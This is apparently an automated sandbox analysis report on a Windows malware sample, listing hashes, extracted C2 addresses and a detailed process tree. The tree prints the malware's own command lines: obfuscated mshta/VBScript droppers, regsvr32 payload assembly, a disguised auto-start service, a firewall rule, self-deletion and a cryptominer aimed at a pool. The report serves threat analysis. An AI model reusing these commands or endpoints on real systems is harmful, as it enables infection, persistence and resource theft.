Analysis

  • max time kernel
    1800s
  • max time network
    1809s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    09-07-2021 23:00

General

  • Target

    toolspab2 (18).exe

  • Size

    315KB

  • MD5

    1d20e1f65938e837ef1b88f10f1bd6c3

  • SHA1

    703d7098dbfc476d2181b7fc041cc23e49c368f1

  • SHA256

    05cd7440851f13dd8f489bb3c06eba385d85d7d9a77a612049c04c541a88593d

  • SHA512

    f9d333abe1f721b8d45d7bc6b5f286af09a8d233bd1d41f0ad891840cf742364aeca2cb6ccd6543f56a8eaf32804f82f72f961d16d5ba663ad706d164915a196

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

rc4.i32
1
0x0a8e21be
rc4.i32
1
0x8fc93161
rc4.i32
1
0xcc4f5fd4
rc4.i32
1
0x2a68f03e

Extracted

Family

redline

Botnet

1

C2

45.32.235.238:45555

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

C2

82.202.161.37:26317

Extracted

Family

redline

Botnet

BtcOnly

C2

185.53.46.82:3214

Extracted

Family

vidar

Version

39.4

Botnet

824

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    824

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Vidar Stealer 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 45 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 24 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 30 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:68
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
        PID:596
        • C:\Users\Admin\AppData\Roaming\tjrsafr
          C:\Users\Admin\AppData\Roaming\tjrsafr
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          PID:1840
          • C:\Users\Admin\AppData\Roaming\tjrsafr
            C:\Users\Admin\AppData\Roaming\tjrsafr
            3⤵
            • Executes dropped EXE
            PID:2344
        • C:\Users\Admin\AppData\Roaming\awrsafr
          C:\Users\Admin\AppData\Roaming\awrsafr
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:4040
        • C:\Users\Admin\AppData\Roaming\tjrsafr
          C:\Users\Admin\AppData\Roaming\tjrsafr
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          PID:1740
          • C:\Users\Admin\AppData\Roaming\tjrsafr
            C:\Users\Admin\AppData\Roaming\tjrsafr
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks SCSI registry key(s)
            PID:1236
        • C:\Users\Admin\AppData\Roaming\awrsafr
          C:\Users\Admin\AppData\Roaming\awrsafr
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          PID:4220
        • C:\Users\Admin\AppData\Roaming\tjrsafr
          C:\Users\Admin\AppData\Roaming\tjrsafr
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          PID:5868
          • C:\Users\Admin\AppData\Roaming\tjrsafr
            C:\Users\Admin\AppData\Roaming\tjrsafr
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks SCSI registry key(s)
            PID:5336
        • C:\Users\Admin\AppData\Roaming\awrsafr
          C:\Users\Admin\AppData\Roaming\awrsafr
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          PID:6140
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
        1⤵
          PID:1076
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Themes
          1⤵
            PID:1212
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
            1⤵
              PID:1204
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1404
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1852
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                  1⤵
                    PID:2424
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                    1⤵
                      PID:2476
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                      1⤵
                        PID:2708
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                        1⤵
                          PID:2696
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s Browser
                          1⤵
                          • Suspicious use of SetThreadContext
                          PID:2788
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                            2⤵
                            • Drops file in System32 directory
                            • Checks processor information in registry
                            • Modifies data under HKEY_USERS
                            • Modifies registry class
                            PID:6100
                        • C:\Users\Admin\AppData\Local\Temp\toolspab2 (18).exe
                          "C:\Users\Admin\AppData\Local\Temp\toolspab2 (18).exe"
                          1⤵
                          • Suspicious use of SetThreadContext
                          • Suspicious use of WriteProcessMemory
                          PID:628
                          • C:\Users\Admin\AppData\Local\Temp\toolspab2 (18).exe
                            "C:\Users\Admin\AppData\Local\Temp\toolspab2 (18).exe"
                            2⤵
                            • Loads dropped DLL
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious behavior: MapViewOfSection
                            PID:2864
                        • C:\Users\Admin\AppData\Local\Temp\7129.exe
                          C:\Users\Admin\AppData\Local\Temp\7129.exe
                          1⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious use of WriteProcessMemory
                          PID:1976
                          • C:\Users\Admin\AppData\Local\Temp\7129.exe
                            C:\Users\Admin\AppData\Local\Temp\7129.exe
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3052
                        • C:\Users\Admin\AppData\Local\Temp\759F.exe
                          C:\Users\Admin\AppData\Local\Temp\759F.exe
                          1⤵
                          • Executes dropped EXE
                          PID:636
                        • C:\Users\Admin\AppData\Local\Temp\790B.exe
                          C:\Users\Admin\AppData\Local\Temp\790B.exe
                          1⤵
                          • Executes dropped EXE
                          PID:3068
                        • C:\Users\Admin\AppData\Local\Temp\7F36.exe
                          C:\Users\Admin\AppData\Local\Temp\7F36.exe
                          1⤵
                          • Executes dropped EXE
                          PID:4040
                        • C:\Users\Admin\AppData\Local\Temp\8523.exe
                          C:\Users\Admin\AppData\Local\Temp\8523.exe
                          1⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:3796
                        • C:\Windows\SysWOW64\explorer.exe
                          C:\Windows\SysWOW64\explorer.exe
                          1⤵
                            PID:4012
                          • C:\Windows\explorer.exe
                            C:\Windows\explorer.exe
                            1⤵
                              PID:1888
                            • C:\Windows\SysWOW64\explorer.exe
                              C:\Windows\SysWOW64\explorer.exe
                              1⤵
                                PID:1560
                              • C:\Windows\explorer.exe
                                C:\Windows\explorer.exe
                                1⤵
                                • Suspicious behavior: MapViewOfSection
                                PID:2980
                              • C:\Windows\SysWOW64\explorer.exe
                                C:\Windows\SysWOW64\explorer.exe
                                1⤵
                                  PID:768
                                • C:\Windows\explorer.exe
                                  C:\Windows\explorer.exe
                                  1⤵
                                  • Suspicious behavior: MapViewOfSection
                                  PID:2796
                                • C:\Windows\SysWOW64\explorer.exe
                                  C:\Windows\SysWOW64\explorer.exe
                                  1⤵
                                    PID:396
                                  • C:\Windows\explorer.exe
                                    C:\Windows\explorer.exe
                                    1⤵
                                    • Suspicious behavior: MapViewOfSection
                                    PID:1176
                                  • C:\Windows\SysWOW64\explorer.exe
                                    C:\Windows\SysWOW64\explorer.exe
                                    1⤵
                                      PID:3008
                                    • C:\Users\Admin\AppData\Local\Temp\E351.exe
                                      C:\Users\Admin\AppData\Local\Temp\E351.exe
                                      1⤵
                                      • Executes dropped EXE
                                      PID:3136
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 480
                                        2⤵
                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                        • Program crash
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3620
                                    • C:\Users\Admin\AppData\Local\Temp\FD49.exe
                                      C:\Users\Admin\AppData\Local\Temp\FD49.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2080
                                    • C:\Users\Admin\AppData\Local\Temp\FEF0.exe
                                      C:\Users\Admin\AppData\Local\Temp\FEF0.exe
                                      1⤵
                                      • Executes dropped EXE
                                      PID:568
                                      • C:\Users\Admin\AppData\Local\Temp\is-CF6SK.tmp\FEF0.tmp
                                        "C:\Users\Admin\AppData\Local\Temp\is-CF6SK.tmp\FEF0.tmp" /SL5="$70038,506127,422400,C:\Users\Admin\AppData\Local\Temp\FEF0.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:3796
                                        • C:\Users\Admin\AppData\Local\Temp\is-TJ091.tmp\1075474_ah_hot_iconçè_)))_.exe
                                          "C:\Users\Admin\AppData\Local\Temp\is-TJ091.tmp\1075474_ah_hot_iconçè_)))_.exe" /S /UID=rec7
                                          3⤵
                                          • Drops file in Drivers directory
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • Drops file in Program Files directory
                                          PID:3800
                                          • C:\Program Files\Windows Sidebar\IKCLRUSQCW\irecord.exe
                                            "C:\Program Files\Windows Sidebar\IKCLRUSQCW\irecord.exe" /VERYSILENT
                                            4⤵
                                            • Executes dropped EXE
                                            PID:1324
                                            • C:\Users\Admin\AppData\Local\Temp\is-FGA0V.tmp\irecord.tmp
                                              "C:\Users\Admin\AppData\Local\Temp\is-FGA0V.tmp\irecord.tmp" /SL5="$10228,5808768,66560,C:\Program Files\Windows Sidebar\IKCLRUSQCW\irecord.exe" /VERYSILENT
                                              5⤵
                                              • Executes dropped EXE
                                              • Drops file in Program Files directory
                                              • Suspicious use of FindShellTrayWindow
                                              PID:4120
                                              • C:\Program Files (x86)\i-record\I-Record.exe
                                                "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                6⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:4488
                                          • C:\Users\Admin\AppData\Local\Temp\67-dec28-50a-ac786-c1a3ea8bcfa43\Fivemyboha.exe
                                            "C:\Users\Admin\AppData\Local\Temp\67-dec28-50a-ac786-c1a3ea8bcfa43\Fivemyboha.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            • Checks computer location settings
                                            PID:4032
                                          • C:\Users\Admin\AppData\Local\Temp\de-d7b13-e10-607aa-23b713b607311\Dywolaboshe.exe
                                            "C:\Users\Admin\AppData\Local\Temp\de-d7b13-e10-607aa-23b713b607311\Dywolaboshe.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            PID:4300
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ubwmeyfn.iis\GcleanerEU.exe /eufive & exit
                                              5⤵
                                                PID:920
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oun3zgq3.1be\installer.exe /qn CAMPAIGN="654" & exit
                                                5⤵
                                                  PID:3988
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cwg2ok1i.hld\ufgaa.exe & exit
                                                  5⤵
                                                    PID:5328
                                                    • C:\Users\Admin\AppData\Local\Temp\cwg2ok1i.hld\ufgaa.exe
                                                      C:\Users\Admin\AppData\Local\Temp\cwg2ok1i.hld\ufgaa.exe
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:5640
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:5964
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:5564
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:716
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:1640
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vyoefepe.0e0\google-game.exe & exit
                                                    5⤵
                                                      PID:5976
                                                      • C:\Users\Admin\AppData\Local\Temp\vyoefepe.0e0\google-game.exe
                                                        C:\Users\Admin\AppData\Local\Temp\vyoefepe.0e0\google-game.exe
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:6136
                                                        • C:\Users\Admin\AppData\Local\Temp\vyoefepe.0e0\google-game.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\vyoefepe.0e0\google-game.exe" -a
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:1092
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\52oojsez.zd4\GcleanerWW.exe /mixone & exit
                                                      5⤵
                                                        PID:4972
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f4htnqqu.njt\toolspab1.exe & exit
                                                        5⤵
                                                          PID:1764
                                                          • C:\Users\Admin\AppData\Local\Temp\f4htnqqu.njt\toolspab1.exe
                                                            C:\Users\Admin\AppData\Local\Temp\f4htnqqu.njt\toolspab1.exe
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:4188
                                                            • C:\Users\Admin\AppData\Local\Temp\f4htnqqu.njt\toolspab1.exe
                                                              C:\Users\Admin\AppData\Local\Temp\f4htnqqu.njt\toolspab1.exe
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Checks SCSI registry key(s)
                                                              • Suspicious behavior: MapViewOfSection
                                                              PID:5692
                                                • C:\Users\Admin\AppData\Local\Temp\913.exe
                                                  C:\Users\Admin\AppData\Local\Temp\913.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  PID:2208
                                                  • C:\Users\Admin\AppData\Local\Temp\913.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\913.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Modifies data under HKEY_USERS
                                                    PID:1400
                                                • C:\Users\Admin\AppData\Local\Temp\CDC.exe
                                                  C:\Users\Admin\AppData\Local\Temp\CDC.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  PID:3984
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\btekfjwo\
                                                    2⤵
                                                      PID:1336
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\cfxzukov.exe" C:\Windows\SysWOW64\btekfjwo\
                                                      2⤵
                                                        PID:2064
                                                      • C:\Windows\SysWOW64\sc.exe
                                                        "C:\Windows\System32\sc.exe" create btekfjwo binPath= "C:\Windows\SysWOW64\btekfjwo\cfxzukov.exe /d\"C:\Users\Admin\AppData\Local\Temp\CDC.exe\"" type= own start= auto DisplayName= "wifi support"
                                                        2⤵
                                                          PID:3456
                                                        • C:\Windows\SysWOW64\sc.exe
                                                          "C:\Windows\System32\sc.exe" description btekfjwo "wifi internet conection"
                                                          2⤵
                                                            PID:3768
                                                          • C:\Windows\SysWOW64\sc.exe
                                                            "C:\Windows\System32\sc.exe" start btekfjwo
                                                            2⤵
                                                              PID:2988
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                              2⤵
                                                                PID:1320
                                                            • C:\Users\Admin\AppData\Local\Temp\15D6.exe
                                                              C:\Users\Admin\AppData\Local\Temp\15D6.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Modifies system certificate store
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:996
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                2⤵
                                                                  PID:2144
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /f /im chrome.exe
                                                                    3⤵
                                                                    • Kills process with taskkill
                                                                    PID:4236
                                                              • C:\Users\Admin\AppData\Local\Temp\1D88.exe
                                                                C:\Users\Admin\AppData\Local\Temp\1D88.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                PID:4040
                                                              • C:\Users\Admin\AppData\Local\Temp\23C3.exe
                                                                C:\Users\Admin\AppData\Local\Temp\23C3.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                PID:3052
                                                              • C:\Users\Admin\AppData\Local\Temp\26F0.exe
                                                                C:\Users\Admin\AppData\Local\Temp\26F0.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                PID:1804
                                                              • C:\Users\Admin\AppData\Local\Temp\2D98.exe
                                                                C:\Users\Admin\AppData\Local\Temp\2D98.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                PID:4072
                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                  "C:\Windows\System32\mshta.exe" VbsCript: clOSE ( CrEAteOBJect ("WscRIPt.ShELL" ). rUN ( "CMd.EXE /q /c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\2D98.exe"" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF """"=="""" for %s IN ( ""C:\Users\Admin\AppData\Local\Temp\2D98.exe"") do taskkill -f /Im ""%~nxs"" " , 0 , truE ) )
                                                                  2⤵
                                                                    PID:2028
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /q /c Copy /Y "C:\Users\Admin\AppData\Local\Temp\2D98.exe" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF ""=="" for %s IN ( "C:\Users\Admin\AppData\Local\Temp\2D98.exe") do taskkill -f /Im "%~nxs"
                                                                      3⤵
                                                                        PID:4128
                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                          taskkill -f /Im "2D98.exe"
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          PID:4760
                                                                        • C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE
                                                                          ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          PID:4628
                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                            "C:\Windows\System32\mshta.exe" VbsCript: clOSE ( CrEAteOBJect ("WscRIPt.ShELL" ). rUN ( "CMd.EXE /q /c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE"" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF ""/PyPXDDGMMiEeTQRVIP2SQdwWi2M""=="""" for %s IN ( ""C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE"") do taskkill -f /Im ""%~nxs"" " , 0 , truE ) )
                                                                            5⤵
                                                                              PID:5060
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /q /c Copy /Y "C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF "/PyPXDDGMMiEeTQRVIP2SQdwWi2M"=="" for %s IN ( "C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE") do taskkill -f /Im "%~nxs"
                                                                                6⤵
                                                                                  PID:3716
                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                "C:\Windows\System32\mshta.exe" VBSCrIpT: cLose ( CreAteObject( "wSCrIPt.ShelL" ). RUN ( "cMd /Q /C ecHo 6C:\Users\Admin\AppData\Local\TempZwG> QEFuCrB.w &ECHO | SeT /p = ""MZ"" > 0CZKPbA.~i &copy /Y /b 0CZKPBA.~i +HzMuGQn.ebg + 3KLPjZ48.1 + JBBP.aZ +jjD1CZ.Z +ME53U.RD + G8HVV~AW.A + QEFuCRB.w ..\LPHzR4.XZ &sTaRt regsvr32.exe ..\LphZr4.XZ /U -S & dEl /Q * " ,0 , tRuE ) )
                                                                                5⤵
                                                                                  PID:4644
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /Q /C ecHo 6C:\Users\Admin\AppData\Local\TempZwG> QEFuCrB.w &ECHO | SeT /p = "MZ" >0CZKPbA.~i &copy /Y /b 0CZKPBA.~i +HzMuGQn.ebg + 3KLPjZ48.1 + JBBP.aZ +jjD1CZ.Z +ME53U.RD + G8HVV~AW.A + QEFuCRB.w ..\LPHzR4.XZ &sTaRt regsvr32.exe ..\LphZr4.XZ /U -S& dEl /Q *
                                                                                    6⤵
                                                                                      PID:1872
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /S /D /c" ECHO "
                                                                                        7⤵
                                                                                          PID:3888
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>0CZKPbA.~i"
                                                                                          7⤵
                                                                                            PID:4876
                                                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                                                            regsvr32.exe ..\LphZr4.XZ /U -S
                                                                                            7⤵
                                                                                            • Loads dropped DLL
                                                                                            • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                            PID:5236
                                                                              • C:\Users\Admin\AppData\Local\Temp\31DF.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\31DF.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Checks processor information in registry
                                                                                PID:816
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im 31DF.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\31DF.exe" & del C:\ProgramData\*.dll & exit
                                                                                  2⤵
                                                                                    PID:5532
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /im 31DF.exe /f
                                                                                      3⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:5736
                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                      timeout /t 6
                                                                                      3⤵
                                                                                      • Delays execution with timeout.exe
                                                                                      PID:5436
                                                                                • C:\Windows\SysWOW64\btekfjwo\cfxzukov.exe
                                                                                  C:\Windows\SysWOW64\btekfjwo\cfxzukov.exe /d"C:\Users\Admin\AppData\Local\Temp\CDC.exe"
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:3116
                                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                                    svchost.exe
                                                                                    2⤵
                                                                                    • Drops file in System32 directory
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • Modifies data under HKEY_USERS
                                                                                    PID:4604
                                                                                    • C:\Windows\SysWOW64\svchost.exe
                                                                                      svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                      3⤵
                                                                                        PID:5248
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                    1⤵
                                                                                    • Drops file in Windows directory
                                                                                    • Modifies Internet Explorer settings
                                                                                    • Modifies registry class
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:4364
                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                    1⤵
                                                                                    • Modifies Internet Explorer settings
                                                                                    PID:5496
                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                    1⤵
                                                                                    • Process spawned unexpected child process
                                                                                    PID:3452
                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                      2⤵
                                                                                      • Loads dropped DLL
                                                                                      • Modifies registry class
                                                                                      PID:5824
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
